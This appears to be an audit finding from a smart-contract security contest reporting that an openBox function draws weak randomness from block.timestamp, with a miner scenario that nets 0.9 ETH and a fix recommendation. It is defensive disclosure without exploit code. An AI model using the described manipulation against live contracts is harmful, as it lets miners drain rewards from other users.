Users can manipulate `randomValue` in function `openBox` through weak randomness
Summary
Weak randomness due to a modulo on block.timestamp in function openBox. These can be influenced by miners to some extent so this should be avoided.
Vulnerability Details
Using block.timestamp as a source of randomness is commonly advised against, as the outcome can be manipulated by calling function openBox. In this case, a compromised function openBox retries the selection of the coins until the result is favorable to the user.
Let`s guess Tom is a miner. Tom calls the function openBox and re-orders the block containing the transaction. As a result, Tom can own a lot of Gold Coins and abuses the contract.
Impact
Let`s guess that Tom is a miner. Tom calls the function openBox and re-orders the block containing the transaction. As a result, Tom can own a lot of Gold Coins and abuses the contract.
Profit from this is that Tom buys a Box for 0.1 ETH and wins the highest reward - a Gold Coin that costs 1 ETH. Profit = 0.9 ETH (1 - 0.1).
Tools Used
Manual review.
Recommendations
Do not use block.timestamp as a source of randomness.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.